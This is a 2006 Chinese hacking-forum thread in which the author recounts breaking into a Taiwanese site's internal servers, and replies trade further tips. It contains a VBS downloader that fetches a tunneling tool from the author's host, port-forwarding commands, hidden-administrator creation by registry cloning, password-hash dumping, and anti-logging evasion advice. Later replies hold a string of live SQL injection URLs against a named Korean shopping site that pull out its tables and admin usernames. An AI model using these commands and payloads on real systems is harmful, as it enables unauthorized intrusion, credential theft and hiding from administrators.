信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：凋凌玫瑰[N.C.P.H]

   内网渗透对于大型网络入侵非常重要，但我们要懂得一些基本的网络结构，防火墙的设置，如果面的DMZ的配置情况，需要掌握端口转发、信息收集、社会工程学的利用、密码破解等，这是我今天上午拿下一网站内网服务器的经历，没什么技术含量，写出来和菜鸟朋友们分享一下。
   情况的起因：这几天没什么好玩的就去玩玩国外网站，国内的不敢玩了。。。。。。。。。。。
转去转来盯上一个中国台湾省的一个大站，有二十几个二级域名的分站点，这下好玩了。来点耐心，一个一个的分站去检测一下，一圈下来居然没收获，不是说站点越大入侵的机率越大嘛。于是再挑两个asp的站点看看，在一个不起眼的地方检测了一下搜索型注入，结果在搜索框里没过滤，便构造了一个注入点用nbsi跑起来。
  不负众望，居然是一个sa权限的，接下来打算写一个webshell上去，才发现是数据库与web分离的，再看一下开放的端口，80、21、1433、3389都开开的，再看一下ip，是内网的，netstat -an看一下，所有的连接都是另一个内网ip,应该是其它服务器内网连接到这台数据库服务器上的,这只是一个小小的数据库服务器。
  再在本机的cmd下通过网站ip telnet一下上面的端口，不通，看来我是被困死在这台数据库服务器上面了，呆然开了3389是登不上的，相信很多人都遇到这种情况过。
于是我便在nbsi执行命令处下写了一段vbs下载脚本上去：
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://www.ncph.net/lcx.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >down.vbs
  接着执行cscript  down.vbs  还好，下载lcx.exe成功，位置为c:\c.exe
  先来执行个端口转发看看，我知道他们的服务器都放在一个防火墙后面，但虽然外面不能访问里面，里面可以访问外面就好说了。
  继续在nbsi里面执行：c:\c.exe  -slave  xxx.xxx.xx.xx  51 172.26.1.248  3389
在我的另一台3389肉机监听:c:\lcx.exe  -listen 51  4489 ,因为我上网是adsl拔号上网，ip会变的，所以我干脆转发到我的3389肉机上面，一是安全，二是速度快，三是可以让它一直转发到上面。因为我3389肉机的3389端口已开放，所以我就转到4489上面了，然后用3389登录127.0.0.1:4489。
  对了，还忘了建帐号，赶紧刷新nbsi建个隐藏帐号mghk$，这时c.exe 的进程并没有结束，所以转发仍没有断开，用建好的帐号直接进入.如图:

temp1.jpg (18 KB)

2006-9-26 15:42

  进去的第一件事当然是隐藏帐号了，以前按照网上的做法总是在用户管理里面看得到mghk$这个用户，玩久了也就知道怎么做最好了，在导出两个注册表后，并不用net user mghk$ /del来删除，以前木木告诉我这样删除，后来我是直接在用户管理里面删除，再导入注册表，再net localgroup administrators mghk$  加入管理组，这里候我们去用户表里和用户管理里面都看不到，除非管理员用net localgroup administrators才可以看到，不过这几个字母打下来手都痛了，所以没几个管理员这样查看的，以至于我的几台3389肉机用了大半年了还安然无恙，当然是高速极品肉机哦。
  第二件事就向他的内网进军，我想到的是立即要做三件事，一是获得管理员密码，如果管理员在线，可以用findpass抓一下，因为这台是windows2000的，也可以用pwdump抓密码哈希再用lc5在本机破解。二是安装嗅探，用cain比较好，因为我们现在上的是3389，三是上传一个扫描软件，内网扫描它网段的内网ip，因为内网扫描我们就已绕过防火墙了,可以得到很多有用信息。
  密码没用findpass到，用pwdump抓了个哈希下来用一台肉机开着lc5跑密码，装了个cain，可win2000需要重启，这里就不重启了，以免打草惊蛇。
  我传了个hscan上去，自己构造了一下字典，然后扫描172.16.1.1-172.16.1.255网段。还传了个ms06040上去，准备内网溢出。扫描一会得到结果，有不少开139，445的，还空连接成功，更令人兴备的是扫出来一个1433弱口令，还是sa的，当然这些在外网是扫不出来的，因为防火墙屏蔽了所有的外网连接，就只有主站通过80端口连出来的。
如图看结果：

temp2.jpg (139 KB)

2006-9-26 15:42

  我再传了一个sql.exe上去，准备连接mssql用户名和密码为sa的ip,执行命令，还好，它还开了3389，当我们真正进入到内网进行操作的时候才发现比平时从外网入侵容易多了。
直接执行命令，如图：

temp3.jpg (106 KB)

2006-9-26 15:42

  进去后再次登上另一台的3389，这台上面已经有部分网站了，再次抓了这台机器的哈希，发现哈希一至，所以应该他们所有的服务器密码都是一至，只等我挂在肉机上的哈希密码跑出来就ok了，一般三天时间就跑出来，这样就可以宣布彻底搞定这个网站的所有服务器，大至登了一下，有八十几台服务器，台湾人真有钱。

temp4.jpg (63 KB)

2006-9-26 15:42

ps:写给菜鸟们分享的，拜托有些网站不要大笔一挥，名字一改就作为自己网站的vip教程，至少应该注明出处，打了半天的字没功劳还是有苦劳嘛。
by rose  of  ncph  http://www.ncph.net

看了这么多
还是比较对你提到的那个
搜索型注入赶兴趣
记的是去年的时候出现的把,.,,当时没怎么仔细看这方面资料
最近搞站时遇到很多搜索型注入漏洞的..不知如何下手
不知玫瑰有这方面的资料不,.,可否提供在下一看

还有那个ms06040我入侵同一段鸡..用他溢出了好几台服务器
内网溢出超强哈.

晕
我刚碰到的情况好象也差不多（但用工具不能执行命令）
添加一个SA用户 用sqltools能连上去 不过断开之后
重新连 就连不上了 而且再加一个用户也连不上
不知道是为什么

我觉得道理都很简单，但是能想到就很不错了。

想我前段时间，搞了一个WEBSHELL，传了CMD。ASPX，命令有DIR，IPCONFIG，NETSTAT -AN能用，NET不能用。除了网站目录可写可读外，其余目录都不可以。

提权简直就停下了，后来无意见传了鸽子，竟然能运行，得到了ADMIN权限，然后进一步得到3389，清理痕迹了。

我就为这个郁闷了好久，后来想，是不是CMD。ASPX运行后继承的是网站目录的权限，权限极低，后来用鸽子，鸽子是在服务器运行的，直接继承的是登陆者的权限。

具体我还是不清楚。

楼上的..有时候在webshell里不能执行net也有可能是管理员改名了
这时候你最好试一下net1
他和net是一样的....我就遇到过几次net不能用
结果用net1加了个管理员..然后3389登陆的.

引用:

这里是引用第[7 楼]的30956569于2006-09-27 04:40发表的：
我就为这个郁闷了好久，后来想，是不是CMD。ASPX运行后继承的是网站目录的权限，权限极低，后来用鸽子，鸽子是在服务器运行的，直接继承的是登陆者的权限。
.......

鸽子真的是继承的是登陆者的权限？？
我看不是吧

我在本机上把e、f盘的system权限去掉
然后中上鸽子
而鸽子竟看不到e、f盘 ！

引用:

这里是引用第[7 楼]的30956569于2006-09-27 04:40发表的：
我觉得道理都很简单，但是能想到就很不错了。

想我前段时间，搞了一个WEBSHELL，传了CMD。ASPX，命令有DIR，IPCONFIG，NETSTAT -AN能用，NET不能用。除了网站目录可写可读外，其余目录都不可以。

提权简直就停下了，后来无意见传了鸽子，竟然能运行，得到了ADMIN权限，然后进一步得到3389，清理痕迹了。
.......

这几台机器我也种了反弹的木马,但都弹不回来,搞不懂.

鸽子应该是继承登陆用户的权限，至少我以前遇到的都是这样。
怎么构造注入点呢？讲一下好吗？

搜索型注入跟一般的注入一样的，也是因为没有过滤变量。
可以这样构造语句，比如输入 mtv'  and '1'='1  和  mtv'  and '1'='2  来测试，mtv是关键字，
实际利用是换成你要的关键字，这种是完全匹配。还有部分匹配，如输入 mtv%'  and  1=1  and '%' = '  
和 mtv%'  and  1=2  and  '%'  = '  来测试，根据返回的页面是否相同就可判断是否有注入漏洞

[s:75]  [s:74] 要是楼猪没有gina2003的话，可尝试卸载其SP1，然后关机等候管理员上机，再用findpass2003搞他的密码...没必要用lc跑个几天几夜...,还有,当你得到ADMIN密码的时候一切都要小心,做事,需不留痕迹,下载东西,不要用管理员的IE,附件-CMD,用FTP或者TFTP VBS下载,开始-RUN,不要输入任何东西, [s:75] 还有一点就是,越大的站越不要搞后门,多搞密码才是正事.下的东西,尽量要少..........了解管理员的作息时间.......他来你就闪,避免被发现撒..渗透嘛.顺便吧管理员的J也日下,这样他就跑不了了. [s:77]

c:\c.exe -slave xxx.xxx.xx.xx 51 172.26.1.248 3389

和
c:\c.exe -slave 172.26.1.248 3389 xxx.xxx.xx.xx 51
一样吗？
以前我试G6FTP的时候。好象htran -slave 127.0.0.1 8024 xxx.xxx.xxx.xxx 12345
的呢。有什么区别吗？

引用:

这里是引用第[9 楼]的hack520于2006-09-29 01:32发表的：
[s:75]  [s:74] 要是楼猪没有gina2003的话，可尝试卸载其SP1，然后关机等候管理员上机，再用findpass2003搞他的密码...没必要用lc跑个几天几夜...,还有,当你得到ADMIN密码的时候一切都要小心,做事,需不留痕迹,下载东西,不要用管理员的IE,附件-CMD,用FTP或者TFTP VBS下载,开始-RUN,不要输入任何东西, [s:75] 还有一点就是,越大的站越不要搞后门,多搞密码才是正事.下的东西,尽量要少..........了解管理员的作息时间.......他来你就闪,避免被发现撒..渗透嘛.顺便吧管理员的J也日下,这样他就跑不了了. [s:77]

有gina2003? [s:80]  给我一个好不嘛?你说的不错,我平时也这样的.不过还是有些地方走弯路了,指点指点.

那sp1或sp2怎么卸载,是在控制面板的添加删除程序中吗???

了解~.~
应该使搜索 xxx'然后把那个搜索结果的地址填到nbsi里面吧。

引用:

这里是引用第[8 楼]的有风吹过于2006-09-28 21:50发表的：
搜索型注入跟一般的注入一样的，也是因为没有过滤变量。
可以这样构造语句，比如输入 mtv'  and '1'='1  和  mtv'  and '1'='2  来测试，mtv是关键字，
实际利用是换成你要的关键字，这种是完全匹配。还有部分匹配，如输入 mtv%'  and  1=1  and '%' = '  
和 mtv%'  and  1=2  and  '%'  = '  来测试，根据返回的页面是否相同就可判断是否有注入漏洞

在注入工具里面怎样填写呢，

[s:75] 还有一点要注意的是，在有服务器权限的情况下 丢ASP马，必须做无日志处理。可不是叫你把他IIS那里纪录日志去铞哦，只是对单个文件进行不纪录日志，不过这样也不算很稳，还是插一句话海洋进去，再进行无日志处理，更改创建时间跟原文件一致，只要他不是一个个个文件去看源码，他是找不到滴

再进行无日志处理? 这点怎么做？老上的。

在IIS里~选中你要进行处理的文件~把记录访问去掉即可

引用:

这里是引用第[9 楼]的hack520于2006-09-29 01:32发表的：
[s:75]  [s:74] 要是楼猪没有gina2003的话，可尝试卸载其SP1，然后关机等候管理员上机，再用findpass2003搞他的密码...没必要用lc跑个几天几夜...,还有,当你得到ADMIN密码的时候一切都要小心,做事,需不留痕迹,下载东西,不要用管理员的IE,附件-CMD,用FTP或者TFTP VBS下载,开始-RUN,不要输入任何东西, [s:75] 还有一点就是,越大的站越不要搞后门,多搞密码才是正事.下的东西,尽量要少..........了解管理员的作息时间.......他来你就闪,避免被发现撒..渗透嘛.顺便吧管理员的J也日下,这样他就跑不了了. [s:77]

gina2003?猪三那里可以得到的？LC在SP1下可以跑？为什么偶几个都跑不起？日了，似乎是RPWT，

谁边说下，偶遇到的大站全部都有安全策略密码周期的哦，搞到了又有啥用？不还是要丢？MBD原来就见过一个BT的，天天换密码。。偶一般是凌晨4点到5点做事的，我把那会比做管理员意志最薄弱的的时候，因为那时候偶也困了^_^
下载东西要看你放什么地方不是？偶把东西一般放WINRAR的目录，哪个J一般都是装的，一点右键就有的东西没哪个人去看他目录吧？
CMD偶是直接写bat,下载偶是用你提供的那个得命令行下东东，效果还不错，感谢一个。：）
建议猪三写个擦PP得东西。。

帖几个baidu出来的关于搜索型注入的文章。百度货，不知道作者是哪个，感谢了先。。 ^_^
简单的判断搜索型注入漏洞存在不存在的办法是先搜索'，如果出错，说明90%存在这个漏洞。然后搜索%，如果正常返回，说明95%有洞了。

然后再搜索一个关键字，比如2006吧，正常返回所有2006相关的信息，再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'='，存在异同的话，就是100%有洞了。

我这里看出有上面说的洞后开始用nbsi来扫，结果总是超时，郁闷，看来要手工来暴需要的信息了。。。

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name()>0 and '%'=' //得到当前数据库名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回错误页面，看来是没有admin这个表了

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' //得到当前数据库的第一个表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' //得到当前数据库的第二个表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpoint'))>0 and '%'=' //得到当前数据库的第三个表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list','tbl_mem_add','tbl_mem_main','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_main','tbl_ord_payment','tbl_ord_prd','tbl_ord_prd_return','tbl_ord_refund','tbl_ord_req_main','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_main','tbl_prd_model','tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))>0%20and%20'%'=' //依次类推，得到所有的表

其实分析可以知道只有这个tbl_admin表才是最重要的。接着开始暴列名。

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第一个列名c_employee_id

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第二个列名c_employee_name

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第三个列名c_password

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第四个列名c_level

列名暴完毕了，嘿嘿，接着开始暴管理员账号密码了。

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' //得到第一个管理员的id为943hoon

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第二个管理员的id为champ

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第三个管理员的id为clark

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第四个管理员的id为hskim

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第五个管理员的id为jajeong

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' //这个语句是暴出管理员密码的，可惜直接返回了正常页面，郁闷。。。。

一会再想别的办法吧。。。。。





再来一个。。这个是黑基的似乎，感谢下。那个问工具的可以看到答案了，另外说下，2.3 的啊D支持搜索型的
注入方式是：

一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/n ... mp;ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
　　　　　　三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%'and 1=1 and '%'=' 返回时有的

我们知道一般搜索代码是这么写的：
Select * from 表名 where 字段 like ’%关键字%’
这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)
这里如果关键字没有过滤的话，就可以这样来构造：
关键字=’ and [查询条件] and ‘%25’=’
这样查询就变成
select * from 表名 where 字段 like '%' and 1=1 and '%'='%'
这样就很好的构成了一个sql注入点，当然用手工也可以，用nbsi也可以~~
注入是不分家的，没必要什么型什么型的！~
如果不信，大家请看下面的《sql注入天书》的原话
第一节、ＳＱＬ注入的一般步骤
首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。
其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：
(A)　ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
(C) 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句：
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

当然手工是麻烦的
用工具的话，我建议用nbsi的工具比较好，就我感觉只有nbsi结合了这个技术，用别的软体是不能注入的
注入点只要写：
http://notebook.samsung.com.cn/n ... p;ST=title&SC=%
再加个特征字符就可以了

引用:

情况的起因：这几天没什么好玩的就去玩玩国外网站，国内的不敢玩了。。。。。。。。。。。
转去转来盯上一个中国台湾省的一个大站，有二十几个二级域名的分站点，这下好玩了。

老大，病句。。。。 [s:88]

建账号的那个学习了,另外CAIN安装不必重启,可直接用,当然也可以本机提取好,肉鸡上解压,驱动提取一下就OK了

引用:

这里是引用第[23 楼]的trace于2006-10-05 05:52发表的：
LZ提到的建立隐藏账号的方法，我试了貌似不行啊

2003系统好像不行

加帐号  *$   
注册表克隆管理员帐号  
导出新加帐号键值与对应的克隆好的那个管理员的权限键值  
删除帐号
导入那两个注册表文件  

2003肯定有效~~~ 屡试不爽~~ [s:75]

引用:

这里是引用第[1 楼]的fhod于2006-09-26 16:43发表的：
看了这么多
还是比较对你提到的那个
搜索型注入赶兴趣
记的是去年的时候出现的把,.,,当时没怎么仔细看这方面资料
最近搞站时遇到很多搜索型注入漏洞的..不知如何下手
.......

溢出失败除了跟打补丁有关，是不是防火强的过滤也有关系呢？